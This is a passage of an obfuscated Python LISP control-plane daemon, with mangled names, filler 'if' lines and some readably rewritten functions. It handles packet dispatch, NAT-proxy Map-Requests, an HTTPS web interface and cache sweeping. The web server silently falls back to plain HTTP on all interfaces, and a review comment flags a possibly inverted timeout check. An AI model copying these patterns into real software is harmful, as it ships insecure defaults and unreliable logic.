        iIiIIIi = ( "Geo-Point:{}{} {}{}<br>Geo-Prefix:{}{} {}, {} " + "kilometer radius{}<br>" ) . format ( IIIIIi11111iiiII1I , i1iI1Ii11Ii1 , I1ii1iI , O0OoO0o ,
        # Ii1I * oO0o - I11i + Oo0Ooo % I1ii11iIi11i - IiII
        I1I1i , o0OoO0oo0O0o , ooO000OO , ii1III1iiIi , I1i1iI )
        iIiIIIi += "Distance:{}{} kilometers, point is {} of circle" . format ( iii1IiI1i ,
        i111IIiIiiI1 , lisp . bold ( OO0 , True ) )
    if 81 - 81: O0 . O0
    return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( iIiIIIi ) ) )
if 75 - 75: iIii1I11I1II1 % IiII + I1ii11iIi11i * O0 . iII111i - ooOoO0o
if 32 - 32: Ii1I % oO0o - i1IIi
if 40 - 40: iIii1I11I1II1 + iII111i * OoOoOO00 + oO0o
if 15 - 15: I11i % I1IiiI - iIii1I11I1II1 * ooOoO0o
if 71 - 71: OoOoOO00 % Oo0Ooo % ooOoO0o
if 34 - 34: I11i / I11i % IiII . OoOoOO00 / Oo0Ooo
if 99 - 99: ooOoO0o * I1IiiI - ooOoO0o % Ii1I
if 40 - 40: OOooOOo / IiII / iIii1I11I1II1 + Ii1I
if 59 - 59: I11i * OoooooooOO + OOooOOo . iIii1I11I1II1 / i1IIi
def O0Oo0O00o0oo0OO(addr_str, port, nonce):
    """Find a cached LISP info-source entry.

    When addr_str is supplied, match on the printed address string plus
    source port; otherwise, when nonce is supplied, match on the nonce.
    Returns the matching info-source object or None.
    """
    if addr_str is not None:
        for candidate in list(lisp.lisp_info_sources_by_address.values()):
            if (candidate.address.print_address_no_iid() == addr_str and
                candidate.port == port):
                return candidate
        return None

    if nonce is not None:
        # dict.get() gives None for a miss, matching the explicit check.
        return lisp.lisp_info_sources_by_nonce.get(nonce)

    return None
if 57 - 57: ooOoO0o . Oo0Ooo - OoO0O00 - i11iIiiIii * I1Ii111 / o0oOOo0O0Ooo
if 79 - 79: I1ii11iIi11i + o0oOOo0O0Ooo % Oo0Ooo * o0oOOo0O0Ooo
if 21 - 21: iII111i
if 24 - 24: iII111i / ooOoO0o
if 61 - 61: iIii1I11I1II1 + oO0o
if 8 - 8: I1Ii111 + OoO0O00
if 9 - 9: OOooOOo + o0oOOo0O0Ooo
if 8 - 8: OOooOOo * Oo0Ooo / iII111i - OoO0O00 - OoooooooOO
def oOiIi ( lisp_sockets , info_source , packet ) :
    # Process an ECM-encapsulated Map-Request received from a cached,
    # NAT'd info-source: strip the ECM, remember the request's nonce on the
    # info-source, replace the ITR-RLOC list with this system's own RLOC,
    # and re-encapsulate the Map-Request toward the mapping system.
    # Returns True when the packet was consumed here, False when an
    # ITR-RLOC is local (caller should process the packet normally).
    if 65 - 65: II111iiii + i1IIi * i11iIiiIii
    if 38 - 38: iIii1I11I1II1 + OoooooooOO * I1IiiI % OoOoOO00 % I11i - IiII
    if 56 - 56: OoooooooOO * Oo0Ooo * I11i + ooOoO0o
    if 54 - 54: OoOoOO00 * i11iIiiIii . OoooooooOO - iIii1I11I1II1
    # Strip the ECM header; a decode failure consumes the packet.
    I1OO0o = lisp . lisp_ecm ( 0 )
    packet = I1OO0o . decode ( packet )
    if ( packet == None ) :
        lisp . lprint ( "Could not decode ECM packet" )
        return ( True )
    if 99 - 99: II111iiii - I1Ii111 + iII111i * IiII / I1Ii111
    if 41 - 41: O0 . I11i
    # The inner message must be a Map-Request.
    oO0ooOOO = lisp . lisp_control_header ( )
    if ( oO0ooOOO . decode ( packet ) == None ) :
        lisp . lprint ( "Could not decode control header" )
        return ( True )
    if 95 - 95: O0
    if ( oO0ooOOO . type != lisp . LISP_MAP_REQUEST ) :
        lisp . lprint ( "Received ECM without Map-Request inside" )
        return ( True )
    if 75 - 75: IiII + OoO0O00 * I11i - OoOoOO00
    if 52 - 52: OOooOOo * oO0o + I11i * I11i % i1IIi % I11i
    if 96 - 96: o0oOOo0O0Ooo * oO0o - OOooOOo * o0oOOo0O0Ooo * i1IIi
    if 8 - 8: ooOoO0o - Oo0Ooo + iIii1I11I1II1 + i1IIi * Ii1I - iIii1I11I1II1
    if 30 - 30: I11i / I1ii11iIi11i
    # Decode the Map-Request and note its nonce and the sender's address.
    iI1iIIIIIiIi1 = lisp . lisp_map_request ( )
    packet = iI1iIIIIIiIi1 . decode ( packet , None , 0 )
    iIi = iI1iIIIIIiIi1 . nonce
    oOoooOo0o = info_source . address . print_address_no_iid ( )
    if 44 - 44: Oo0Ooo . Oo0Ooo + OoooooooOO * i11iIiiIii / I11i + I1Ii111
    if 17 - 17: OOooOOo + II111iiii
    if 43 - 43: I11i % Ii1I / o0oOOo0O0Ooo * I1Ii111
    if 85 - 85: iIii1I11I1II1 . OoooooooOO . o0oOOo0O0Ooo
    iI1iIIIIIiIi1 . print_map_request ( )
    if 77 - 77: I1IiiI % ooOoO0o
    lisp . lprint ( "Process {} from info-source {}, port {}, nonce 0x{}" . format ( lisp . bold ( "nat-proxy Map-Request" , False ) ,
    # II111iiii + Ii1I + OoooooooOO / i1IIi - Ii1I
    lisp . red ( oOoooOo0o , False ) , info_source . port ,
    lisp . lisp_hex_string ( iIi ) ) )
    if 87 - 87: iII111i / I11i / I11i % OoooooooOO - I1ii11iIi11i * oO0o
    if 23 - 23: i11iIiiIii
    if 100 - 100: oO0o + O0 . I1IiiI + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
    if 65 - 65: II111iiii / Oo0Ooo
    if 42 - 42: i11iIiiIii . O0
    # Remember the nonce so the eventual Map-Reply/Notify can be matched
    # back to this info-source.
    info_source . cache_nonce_for_info_source ( iIi )
    if 75 - 75: I1Ii111 + iIii1I11I1II1
    if 19 - 19: I1IiiI + i11iIiiIii . IiII - I11i / Ii1I + o0oOOo0O0Ooo
    if 38 - 38: Oo0Ooo / iIii1I11I1II1 * iIii1I11I1II1 % I1ii11iIi11i
    if 92 - 92: I11i / O0 * I1IiiI - I11i
    if 99 - 99: i11iIiiIii % OoooooooOO
    # A subscribe request keeps the info-source from being timed out.
    info_source . no_timeout = iI1iIIIIIiIi1 . subscribe_bit
    if 56 - 56: IiII * I1Ii111
    if 98 - 98: I11i + O0 * I1Ii111 + i11iIiiIii - OOooOOo - iIii1I11I1II1
    if 5 - 5: OOooOOo % Oo0Ooo % IiII % ooOoO0o
    if 17 - 17: Ii1I + II111iiii + OoooooooOO / OOooOOo / IiII
    if 80 - 80: o0oOOo0O0Ooo % i1IIi / I11i
    if 56 - 56: i1IIi . i11iIiiIii
    # If any ITR-RLOC is one of our own addresses, let normal processing
    # handle the packet instead of proxying it.
    for Ii1Ii1IiIIIi1 in iI1iIIIIIiIi1 . itr_rlocs :
        if ( Ii1Ii1IiIIIi1 . is_local ( ) ) : return ( False )
    if 55 - 55: oO0o + O0 / iII111i % ooOoO0o / OoooooooOO
    if 98 - 98: Ii1I * iIii1I11I1II1 % Oo0Ooo % OOooOOo
    if 88 - 88: iII111i - II111iiii / iII111i - Ii1I
    if 16 - 16: Oo0Ooo % I1Ii111
    if 10 - 10: IiII / OoooooooOO
    # Replace the ITR-RLOC list with our own (IPv4) RLOC and re-encode.
    IiiiIIiii = lisp . lisp_myrlocs [ 0 ]
    iI1iIIIIIiIi1 . itr_rloc_count = 0
    iI1iIIIIIiIi1 . itr_rlocs = [ ]
    iI1iIIIIIiIi1 . itr_rlocs . append ( IiiiIIiii )
    if 91 - 91: o0oOOo0O0Ooo . iII111i % Oo0Ooo - iII111i . oO0o % i11iIiiIii
    packet = iI1iIIIIIiIi1 . encode ( None , 0 )
    iI1iIIIIIiIi1 . print_map_request ( )
    if 25 - 25: iIii1I11I1II1
    # For an IPv6 target EID, prefer the IPv6 RLOC as the ECM source
    # (note: the encoded ITR-RLOC list above still holds the IPv4 RLOC).
    o0o0O0oOOOooo = iI1iIIIIIiIi1 . target_eid
    if ( o0o0O0oOOOooo . is_ipv6 ( ) ) :
        Ii1iiI1i1 = lisp . lisp_myrlocs [ 1 ]
        if ( Ii1iiI1i1 != None ) : IiiiIIiii = Ii1iiI1i1
    if 3 - 3: OOooOOo . IiII / Oo0Ooo
    if 89 - 89: OoooooooOO . iIii1I11I1II1 . Oo0Ooo * iIii1I11I1II1 - I1Ii111
    if 92 - 92: OoooooooOO - I1ii11iIi11i - OoooooooOO % I1IiiI % I1IiiI % iIii1I11I1II1
    if 92 - 92: iII111i * O0 % I1Ii111 . iIii1I11I1II1
    if 66 - 66: I11i + Ii1I
    # Send toward the mapping system; deliver locally when a lisp-ms
    # process is running on this box.
    i1ii1iIi = lisp . lisp_is_running ( "lisp-ms" )
    lisp . lisp_send_ecm ( lisp_sockets , packet , o0o0O0oOOOooo , lisp . LISP_CTRL_PORT ,
    o0o0O0oOOOooo , IiiiIIiii , to_ms = i1ii1iIi , ddt = False )
    return ( True )
if 43 - 43: Ii1I + iII111i + i1IIi - OoOoOO00 + o0oOOo0O0Ooo
if 54 - 54: I1ii11iIi11i + I1ii11iIi11i + I11i % i1IIi % i11iIiiIii
if 100 - 100: I1ii11iIi11i
if 96 - 96: I1IiiI . IiII * II111iiii % IiII . I1Ii111 * i1IIi
if 83 - 83: iIii1I11I1II1
if 97 - 97: i11iIiiIii + Oo0Ooo * OOooOOo % iII111i . IiII
if 4 - 4: O0 . iII111i - iIii1I11I1II1
if 19 - 19: OOooOOo % OoO0O00 / Ii1I + II111iiii % OoooooooOO
if 89 - 89: Ii1I
def o00O00O0Oo0(lisp_sockets, info_source, packet, mr_or_mn):
    """Relay a Map-Reply (mr_or_mn true) or Map-Notify (mr_or_mn false)
    back to the info-source that originated the proxied request."""
    addr_str = info_source.address.print_address_no_iid()
    port = info_source.port
    nonce = info_source.nonce

    label = "Reply" if mr_or_mn else "Notify"
    label = lisp.bold("nat-proxy Map-{}".format(label), False)

    lisp.lprint("Forward {} to info-source {}, port {}, nonce 0x{}".format(
        label, lisp.red(addr_str, False), port, lisp.lisp_hex_string(nonce)))

    #
    # Convert the address string via lisp_convert_4to6 and send the packet
    # to the info-source's address and port.
    #
    dest = lisp.lisp_convert_4to6(addr_str)
    lisp.lisp_send(lisp_sockets, dest, port, packet)
if 79 - 79: IiII + IiII + Ii1I
if 39 - 39: O0 - OoooooooOO
if 63 - 63: iIii1I11I1II1 % o0oOOo0O0Ooo * ooOoO0o
if 79 - 79: O0
if 32 - 32: II111iiii . O0 + Ii1I / OoOoOO00 / IiII / OOooOOo
if 15 - 15: I1ii11iIi11i
if 4 - 4: IiII + iIii1I11I1II1 * iII111i + Oo0Ooo * o0oOOo0O0Ooo % II111iiii
def OO0o0o0oo ( lisp_sockets , source , sport , packet ) :
    # Dispatch a received LISP control packet to the correct component
    # process via IPC, or proxy it back to a NAT'd info-source.  Ooo is the
    # module-level IPC socket used by lisp.lisp_ipc().
    global Ooo
    if 40 - 40: Oo0Ooo
    oO0ooOOO = lisp . lisp_control_header ( )
    if ( oO0ooOOO . decode ( packet ) == None ) :
        lisp . lprint ( "Could not decode control header" )
        return
    if 47 - 47: OoOoOO00
    if 65 - 65: O0 + I1Ii111 % Ii1I * I1IiiI / ooOoO0o / OoOoOO00
    if 71 - 71: i11iIiiIii / OoOoOO00 . oO0o
    if 33 - 33: oO0o
    if 39 - 39: OoO0O00 + O0 + ooOoO0o * II111iiii % O0 - O0
    if 41 - 41: IiII % o0oOOo0O0Ooo
    if 67 - 67: O0 % I1Ii111
    if 35 - 35: I1IiiI . OoOoOO00 + OoooooooOO % Oo0Ooo % OOooOOo
    if 39 - 39: Ii1I
    if 60 - 60: OOooOOo
    # Info-Requests are processed here directly; Info-Replies fall through.
    if ( oO0ooOOO . type == lisp . LISP_NAT_INFO ) :
        if ( oO0ooOOO . info_reply == False ) :
            lisp . lisp_process_info_request ( lisp_sockets , packet , source , sport ,
            lisp . lisp_ms_rtr_list )
        if 62 - 62: I1Ii111 * I11i
        return
    if 74 - 74: OoOoOO00 . iIii1I11I1II1
    if 87 - 87: ooOoO0o
    # Keep the raw bytes; wrap a copy in the IPC framing for forwarding.
    IIo0oo0OO = packet
    packet = lisp . lisp_packet_ipc ( packet , source , sport )
    if 17 - 17: ooOoO0o + I1ii11iIi11i * i11iIiiIii
    if 82 - 82: IiII
    if 51 - 51: oO0o % OoO0O00 + o0oOOo0O0Ooo + Ii1I - OoooooooOO . OoO0O00
    if 18 - 18: Oo0Ooo - OOooOOo * II111iiii + oO0o
    # Registrations and Notify-Acks always go to the map-server process.
    if ( oO0ooOOO . type in ( lisp . LISP_MAP_REGISTER , lisp . LISP_MAP_NOTIFY_ACK ) ) :
        lisp . lisp_ipc ( packet , Ooo , "lisp-ms" )
        return
    if 93 - 93: iII111i * oO0o . OoO0O00 - Ii1I + O0 * OoO0O00
    if 59 - 59: II111iiii
    if 43 - 43: Oo0Ooo + OoooooooOO
    if 47 - 47: ooOoO0o
    if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
    # Map-Reply: proxy to a nonce-matched info-source if one exists,
    # otherwise to a waiting lisp-lig instance, otherwise to the ITR.
    if ( oO0ooOOO . type == lisp . LISP_MAP_REPLY ) :
        ii11Ii1IiiI1 = lisp . lisp_map_reply ( )
        ii11Ii1IiiI1 . decode ( IIo0oo0OO )
        if 83 - 83: ooOoO0o + i1IIi * OoooooooOO * oO0o
        OooO00 = O0Oo0O00o0oo0OO ( None , 0 , ii11Ii1IiiI1 . nonce )
        if ( OooO00 ) :
            o00O00O0Oo0 ( lisp_sockets , OooO00 , IIo0oo0OO , True )
        else :
            iIIi1Ii1III = "/tmp/lisp-lig"
            if ( os . path . exists ( iIIi1Ii1III ) ) :
                lisp . lisp_ipc ( packet , Ooo , iIIi1Ii1III )
            else :
                lisp . lisp_ipc ( packet , Ooo , "lisp-itr" )
            if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
        if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
        return
    if 21 - 21: OoO0O00
    if 63 - 63: I11i . O0 * I11i + iIii1I11I1II1
    if 46 - 46: i1IIi + II111iiii * i1IIi - Ii1I
    if 79 - 79: II111iiii - oO0o * I1ii11iIi11i - OoOoOO00 . I1ii11iIi11i
    if 11 - 11: O0 * OoOoOO00
    # Map-Notify: same proxying logic; otherwise deliver to the RTR when
    # one is running, else the ETR.
    if ( oO0ooOOO . type == lisp . LISP_MAP_NOTIFY ) :
        IIii1i = lisp . lisp_map_notify ( lisp_sockets )
        IIii1i . decode ( IIo0oo0OO )
        if 69 - 69: I1Ii111 / OoooooooOO % i11iIiiIii
        OooO00 = O0Oo0O00o0oo0OO ( None , 0 , IIii1i . nonce )
        if ( OooO00 ) :
            o00O00O0Oo0 ( lisp_sockets , OooO00 , IIo0oo0OO ,
            False )
        else :
            iIIi1Ii1III = "/tmp/lisp-lig"
            if ( os . path . exists ( iIIi1Ii1III ) ) :
                lisp . lisp_ipc ( packet , Ooo , iIIi1Ii1III )
            else :
                iIii11iI1II = "lisp-rtr" if lisp . lisp_is_running ( "lisp-rtr" ) else "lisp-etr"
                if 18 - 18: i11iIiiIii - ooOoO0o * oO0o + o0oOOo0O0Ooo
                lisp . lisp_ipc ( packet , Ooo , iIii11iI1II )
            if 16 - 16: OoooooooOO * i11iIiiIii . OoooooooOO - iIii1I11I1II1 * i1IIi
        if 33 - 33: I1Ii111 % II111iiii
        return
    if 49 - 49: I1ii11iIi11i + I11i / o0oOOo0O0Ooo + OoooooooOO + OOooOOo / IiII
    if 29 - 29: Ii1I - Ii1I / ooOoO0o
    if 49 - 49: I11i + oO0o % OoO0O00 - Oo0Ooo - O0 - OoooooooOO
    if 4 - 4: II111iiii - oO0o % Oo0Ooo * i11iIiiIii
    if 18 - 18: Oo0Ooo % O0
    if 66 - 66: iIii1I11I1II1 % i11iIiiIii / I1IiiI
    # Map-Referral: to a waiting lisp-rig instance, else the map-resolver.
    if ( oO0ooOOO . type == lisp . LISP_MAP_REFERRAL ) :
        Ooo000O00 = "/tmp/lisp-rig"
        if ( os . path . exists ( Ooo000O00 ) ) :
            lisp . lisp_ipc ( packet , Ooo , Ooo000O00 )
        else :
            lisp . lisp_ipc ( packet , Ooo , "lisp-mr" )
        if 47 - 47: I1ii11iIi11i * oO0o + iIii1I11I1II1 - oO0o / IiII
        return
    if 86 - 86: IiII
    if 43 - 43: I1IiiI / iII111i / ooOoO0o + iIii1I11I1II1 + OoooooooOO
    if 33 - 33: II111iiii - IiII - ooOoO0o
    if 92 - 92: OoO0O00 * IiII
    if 92 - 92: oO0o
    if 7 - 7: iII111i
    # Map-Request: SMRs go to the ITR, others to the ETR; RLOC-probes are
    # dropped here.
    if ( oO0ooOOO . type == lisp . LISP_MAP_REQUEST ) :
        iIii11iI1II = "lisp-itr" if ( oO0ooOOO . is_smr ( ) ) else "lisp-etr"
        if 73 - 73: OoO0O00 % I1ii11iIi11i
        if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
        if 62 - 62: i11iIiiIii
        if 2 - 2: I1IiiI
        if 69 - 69: OoooooooOO / Oo0Ooo * I1Ii111
        if ( oO0ooOOO . rloc_probe ) : return
        if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * oO0o / II111iiii % OoooooooOO
        lisp . lisp_ipc ( packet , Ooo , iIii11iI1II )
        return
    if 14 - 14: IiII . IiII % ooOoO0o
    if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
    if 33 - 33: II111iiii / O0 / IiII - I11i - i1IIi
    if 8 - 8: i11iIiiIii . iII111i / iIii1I11I1II1 / I1ii11iIi11i / IiII - Ii1I
    if 32 - 32: o0oOOo0O0Ooo . i1IIi * Oo0Ooo
    if 98 - 98: Ii1I - II111iiii / I1IiiI . oO0o * IiII . I11i
    if 25 - 25: i11iIiiIii / OoOoOO00 - I1Ii111 / OoO0O00 . o0oOOo0O0Ooo . o0oOOo0O0Ooo
    if 6 - 6: oO0o . I11i
    # ECM: first give the NAT-proxy path a chance (match by address/port);
    # otherwise route by the header's destination flags.
    if ( oO0ooOOO . type == lisp . LISP_ECM ) :
        OooO00 = O0Oo0O00o0oo0OO ( source , sport , None )
        if ( OooO00 ) :
            if ( oOiIi ( lisp_sockets , OooO00 ,
            IIo0oo0OO ) ) : return
        if 43 - 43: I1ii11iIi11i + o0oOOo0O0Ooo
        if 50 - 50: oO0o % i1IIi * O0
        iIii11iI1II = "lisp-mr"
        if ( oO0ooOOO . is_to_etr ( ) ) :
            iIii11iI1II = "lisp-etr"
        elif ( oO0ooOOO . is_to_ms ( ) ) :
            iIii11iI1II = "lisp-ms"
        elif ( oO0ooOOO . is_ddt ( ) ) :
            if ( lisp . lisp_is_running ( "lisp-ddt" ) ) :
                iIii11iI1II = "lisp-ddt"
            elif ( lisp . lisp_is_running ( "lisp-ms" ) ) :
                iIii11iI1II = "lisp-ms"
            if 4 - 4: iIii1I11I1II1 . i1IIi
        elif ( lisp . lisp_is_running ( "lisp-mr" ) == False ) :
            iIii11iI1II = "lisp-etr"
        if 63 - 63: iIii1I11I1II1 + IiII % i1IIi / I1IiiI % II111iiii
        lisp . lisp_ipc ( packet , Ooo , iIii11iI1II )
        if 60 - 60: o0oOOo0O0Ooo . OoOoOO00 % I1Ii111 / I1IiiI / O0
        return
if 19 - 19: i11iIiiIii . I1IiiI + II111iiii / OOooOOo . I1ii11iIi11i * ooOoO0o
if 59 - 59: iIii1I11I1II1 / I1ii11iIi11i % ooOoO0o
if 84 - 84: iIii1I11I1II1 / I1IiiI . OoOoOO00 % I11i
if 99 - 99: Oo0Ooo + i11iIiiIii
if 36 - 36: Ii1I * I1Ii111 * iIii1I11I1II1 - I11i % i11iIiiIii
if 98 - 98: iIii1I11I1II1 - i1IIi + ooOoO0o % I11i + ooOoO0o / oO0o
if 97 - 97: IiII % ooOoO0o + II111iiii - IiII % OoO0O00 + ooOoO0o
if 31 - 31: o0oOOo0O0Ooo
if 35 - 35: OoOoOO00 + Ii1I * ooOoO0o / OoOoOO00
if 69 - 69: ooOoO0o . OOooOOo - I1IiiI
if 29 - 29: i11iIiiIii . I1ii11iIi11i / I1IiiI . OOooOOo + i11iIiiIii
if 26 - 26: IiII / Ii1I - OoooooooOO
class iiIiiII1II1ii(bottle.ServerAdapter):
    """Bottle server adapter that serves HTTPS using ./lisp-cert.pem,
    bootstrapping the cert from lisp-cert.pem.default when absent."""

    def run(self, hand):
        cert_file = "./lisp-cert.pem"

        #
        # First-run bootstrap: materialize the cert from the shipped
        # default before starting the server.
        #
        if not os.path.exists(cert_file):
            os.system("cp ./lisp-cert.pem.default {}".format(cert_file))
            lisp.lprint(("{} does not exist, creating a copy from lisp-" +
                "cert.pem.default").format(cert_file))

        server = wsgi_server((self.host, self.port), hand)
        server.ssl_adapter = ssl_adaptor(cert_file, cert_file, None)
        try:
            server.start()
        finally:
            server.stop()
if 6 - 6: OoO0O00
if 99 - 99: o0oOOo0O0Ooo * OOooOOo % oO0o * oO0o + OoooooooOO
if 82 - 82: I11i / OoOoOO00 - OOooOOo / ooOoO0o
if 50 - 50: OOooOOo + OoO0O00 . i11iIiiIii + I1ii11iIi11i + i11iIiiIii
if 31 - 31: oO0o * I1Ii111 . OoOoOO00 * I11i
if 28 - 28: IiII + I1IiiI - Oo0Ooo % OOooOOo . I11i + I1IiiI
if 72 - 72: Ii1I / Oo0Ooo / oO0o * OoOoOO00 + OOooOOo
if 58 - 58: o0oOOo0O0Ooo % I1IiiI . I1IiiI * OoO0O00 - IiII . OoooooooOO
if 10 - 10: I1Ii111
if 48 - 48: iII111i * i1IIi % OoooooooOO * Ii1I * OoO0O00
if 7 - 7: iII111i . Ii1I . iII111i - I1Ii111
if 33 - 33: ooOoO0o + OoooooooOO - OoO0O00 / i1IIi / OoooooooOO
if 82 - 82: I1ii11iIi11i / OOooOOo - iII111i / Oo0Ooo * OoO0O00
if 55 - 55: OoooooooOO
if 73 - 73: OoOoOO00 - I1ii11iIi11i % Oo0Ooo + I1ii11iIi11i - O0 . OoO0O00
if 38 - 38: O0
def ooO(bottle_port):
    """Run the web-interface listener thread.

    A negative bottle_port requests a plain HTTP listener on -bottle_port.
    Otherwise the SSL server adapter is registered and HTTPS is attempted
    first, falling back to plain HTTP if the secure server fails to start.
    """
    lisp.lisp_set_exception()

    #
    # Negative port means "no SSL": serve plain HTTP and return.
    #
    if bottle_port < 0:
        bottle.run(host="0.0.0.0", port=-bottle_port)
        return

    #
    # Register the SSL adapter under a named server so bottle.run can
    # select it.
    #
    bottle.server_names["lisp-ssl-server"] = iiIiiII1II1ii

    try:
        bottle.run(host="0.0.0.0", port=bottle_port, server="lisp-ssl-server",
            fast=True)
    except Exception:
        # Narrowed from a bare "except:" so KeyboardInterrupt/SystemExit
        # are not swallowed into an insecure restart.
        lisp.lprint("Could not startup lisp-ssl-server, running insecurely")
        bottle.run(host="0.0.0.0", port=bottle_port)
    return
if 35 - 35: II111iiii / OoOoOO00 - O0 . II111iiii
if 55 - 55: Oo0Ooo % i1IIi * I11i
if 95 - 95: OOooOOo / II111iiii - o0oOOo0O0Ooo % I1Ii111 . I11i
if 63 - 63: iIii1I11I1II1 / ooOoO0o
if 24 - 24: Oo0Ooo / iIii1I11I1II1 % OOooOOo * OoOoOO00 - iIii1I11I1II1
if 50 - 50: II111iiii
if 39 - 39: II111iiii . OoOoOO00 - Oo0Ooo * i1IIi . OoooooooOO
if 44 - 44: I1IiiI
def oOO0O0O0OO00oo():
    # Minimal thread body: install lisp's thread exception hook, then exit.
    lisp.lisp_set_exception()
    return
if 75 - 75: i11iIiiIii . ooOoO0o % i1IIi . I1IiiI - oO0o + Oo0Ooo
if 66 - 66: oO0o % I1ii11iIi11i . II111iiii / OoOoOO00 / OoO0O00
if 47 - 47: iII111i + O0 / II111iiii * I1IiiI - OoooooooOO . Ii1I
if 28 - 28: oO0o . oO0o . iIii1I11I1II1 . OOooOOo . I1ii11iIi11i * i11iIiiIii
if 72 - 72: I11i
if 26 - 26: IiII % Oo0Ooo
if 72 - 72: O0 + o0oOOo0O0Ooo + I1IiiI / Oo0Ooo
if 83 - 83: IiII - I1IiiI . Ii1I
if 34 - 34: OoOoOO00 - oO0o * OoooooooOO
def IiI1I1IIIi1i(lisp_socket):
    """Poll once per second for LISP component processes coming up or going
    down.  Each transition is logged; when a component (re)appears its
    stored configuration is replayed to it under the IPC lock."""
    lisp.lisp_set_exception()

    status = {
        "lisp-itr": False, "lisp-etr": False, "lisp-rtr": False,
        "lisp-mr": False, "lisp-ms": False, "lisp-ddt": False
    }

    while True:
        time.sleep(1)

        previous, status = status, {}
        for name in previous:
            running = lisp.lisp_is_running(name)
            status[name] = running
            if previous[name] == running: continue

            lisp.lprint("*** Process '{}' has {} ***".format(name,
                "come up" if running else "gone down"))

            #
            # Newly started component: push the configuration to it while
            # holding the IPC lock.
            #
            if running:
                lisp.lisp_ipc_lock.acquire()
                lispconfig.lisp_send_commands(lisp_socket, name)
                lisp.lisp_ipc_lock.release()
    return
if 77 - 77: O0 * I1ii11iIi11i * oO0o + OoO0O00 + I1ii11iIi11i - I1Ii111
if 10 - 10: I1ii11iIi11i + IiII
if 58 - 58: I1IiiI + OoooooooOO / iII111i . ooOoO0o % o0oOOo0O0Ooo / I1ii11iIi11i
if 62 - 62: II111iiii
if 12 - 12: IiII + II111iiii
if 92 - 92: I1Ii111 % iIii1I11I1II1 - iII111i / i11iIiiIii % ooOoO0o * o0oOOo0O0Ooo
if 80 - 80: iII111i
def iI1I1ii11IIi1 ( ) :
    # Periodic (60-second) sweeper over the cached info-sources: removes
    # selected entries from lisp_info_sources_by_address and drops their
    # nonce entries from lisp_info_sources_by_nonce.  Entries flagged
    # no_timeout are never removed.
    lisp . lisp_set_exception ( )
    OOo = 60
    if 80 - 80: o0oOOo0O0Ooo / oO0o / Ii1I - I1IiiI % I1Ii111
    while ( True ) :
        time . sleep ( OOo )
        if 44 - 44: I1IiiI % OOooOOo * i11iIiiIii * i11iIiiIii - Oo0Ooo . I1Ii111
        o00 = [ ]
        i111iiIiiIiI = lisp . lisp_get_timestamp ( )
        if 59 - 59: OOooOOo + I1IiiI / II111iiii / OoOoOO00
        if 80 - 80: OoOoOO00 + iIii1I11I1II1 . IiII
        if 76 - 76: I1IiiI * OOooOOo
        if 12 - 12: iIii1I11I1II1 / I11i % Ii1I
        for iI1i in lisp . lisp_info_sources_by_address :
            OooO00 = lisp . lisp_info_sources_by_address [ iI1i ]
            if ( OooO00 . no_timeout ) : continue
            # NOTE(review): this skips (keeps) entries whose uptime+60 is
            # already in the past and expires the *newer* ones, which looks
            # inverted for a timeout sweep — confirm whether '<' should be
            # '>' (or whether uptime is refreshed elsewhere on activity).
            if ( OooO00 . uptime + OOo < i111iiIiiIiI ) : continue
            if 49 - 49: OoO0O00 + II111iiii / IiII - O0 % Ii1I
            o00 . append ( iI1i )
            if 27 - 27: OoO0O00 + Oo0Ooo
            # Also drop the entry's nonce mapping, if it has one.
            iIi = OooO00 . nonce
            if ( iIi == None ) : continue
            if ( iIi in lisp . lisp_info_sources_by_nonce ) :
                lisp . lisp_info_sources_by_nonce . pop ( iIi )
            if 92 - 92: I1IiiI % iII111i
        if 31 - 31: OoooooooOO - oO0o / I1Ii111
        if 62 - 62: i11iIiiIii - I11i
        if 81 - 81: I11i
        if 92 - 92: OOooOOo - Oo0Ooo - OoooooooOO / IiII - i1IIi
        if 81 - 81: i1IIi / I1Ii111 % i11iIiiIii . iIii1I11I1II1 * OoOoOO00 + OoooooooOO
        # Delete outside the iteration to avoid mutating the dict in-loop.
        for iI1i in o00 :
            lisp . lisp_info_sources_by_address . pop ( iI1i )
        if 31 - 31: i1IIi % II111iiii
        if 13 - 13: iIii1I11I1II1 - II111iiii % O0 . Ii1I % OoO0O00
    return
if 2 - 2: OoooooooOO - Ii1I % oO0o / I1IiiI / o0oOOo0O0Ooo
if 3 - 3: II111iiii / OOooOOo
if 48 - 48: ooOoO0o . I1ii11iIi11i
if 49 - 49: i1IIi - OoOoOO00 . Oo0Ooo + iIii1I11I1II1 - ooOoO0o / Oo0Ooo
if 24 - 24: oO0o - iII111i / ooOoO0o
if 10 - 10: OoOoOO00 * i1IIi
if 15 - 15: I11i + i1IIi - II111iiii % I1IiiI
if 34 - 34: I1IiiI
def o0OoOo0O00 ( lisp_ipc_control_socket , lisp_sockets ) :
    # IPC receive loop: reads "@"-delimited control-packet messages from
    # the component processes ("control-packet@<dest>@<port>@<payload>"),
    # logs them, and either re-dispatches locally (nonce-matched
    # Map-Replies, ETR Map-Notify relays) or sends them on the wire.
    lisp . lisp_set_exception ( )
    while ( True ) :
        # NOTE(review): bare except on recvfrom ends the loop by returning
        # a 4-tuple of empty strings — the caller apparently ignores it.
        try : iI1i1iI1iI = lisp_ipc_control_socket . recvfrom ( 9000 )
        except : return ( [ "" , "" , "" , "" ] )
        iiiI11 = iI1i1iI1iI [ 0 ] . split ( "@" )
        oOOo0 = iI1i1iI1iI [ 1 ]
        if 18 - 18: I11i + Oo0Ooo - OoO0O00 / I1Ii111 / OOooOOo
        # Message fields: opcode, destination address, port, payload parts.
        III1iII1I1ii = iiiI11 [ 0 ]
        O0o0O0O0O = iiiI11 [ 1 ]
        oo00O00oO = int ( iiiI11 [ 2 ] )
        OOoOoO = iiiI11 [ 3 : : ]
        if 72 - 72: OoOoOO00 / I1Ii111 * IiII % iIii1I11I1II1
        if 53 - 53: OoO0O00 . O0 . I1IiiI * OOooOOo / o0oOOo0O0Ooo
        if 34 - 34: OoOoOO00
        if 16 - 16: i1IIi - I1Ii111 - II111iiii
        # A payload containing "@" was split apart; re-stuff it.
        if ( len ( OOoOoO ) > 1 ) :
